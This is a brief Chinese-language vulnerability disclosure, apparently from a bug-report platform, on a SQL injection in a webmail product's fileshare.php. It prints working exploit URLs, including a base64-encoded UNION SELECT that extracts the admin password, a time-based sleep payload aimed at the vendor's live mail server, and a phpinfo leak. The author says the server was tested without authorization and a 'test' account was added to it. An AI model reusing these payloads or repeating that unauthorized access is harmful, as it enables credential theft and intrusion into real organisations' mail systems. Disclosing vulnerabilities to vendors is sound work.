### 简要描述:
服务器的企业和政府应该挺多的, 在官网看了下,客户有中国电信、中国人民银行、外交部等等,希望尽快通知厂商处理吧
### 详细说明:
漏洞exp:
http://xxxx/webmail/fileshare.php?inmail=1&file=MScgdW5pb24gc2VsZWN0IDEsMiwzLDQsKHNlbGVjdCBwYXNzd29yZCBmcm9tIHdlYl91c3Igd2hlcmUgdXNyX25hbWU9J2FkbWluJyksNiw3LDgsOSwxMCwxMSwxMiwxMywxNCM=
(flie的内容为注射语句的base64加密,无视GPC)
sleep的exp:
http://mail.comingchina.com/webmail/fileshare.php?file=MTEzMycgYW5kIHNsZWVwKDEwKT4wIw
phpinfo信息泄露:
http://xxxx/webmail/info.php
官网邮箱服务器测试,服务器是台虚拟机,由于未授权,未进一步渗透内网,仅仅添加了一个test的用户:
[<img src="https://images.seebug.org/upload/201307/25110145639afff5e42d8df13fc5ee52bb636323.png" alt="23.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201307/25110145639afff5e42d8df13fc5ee52bb636323.png)
### 漏洞证明:
官网邮箱服务器测试:
[<img src="https://images.seebug.org/upload/201307/25110145639afff5e42d8df13fc5ee52bb636323.png" alt="23.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201307/25110145639afff5e42d8df13fc5ee52bb636323.png)
暂无评论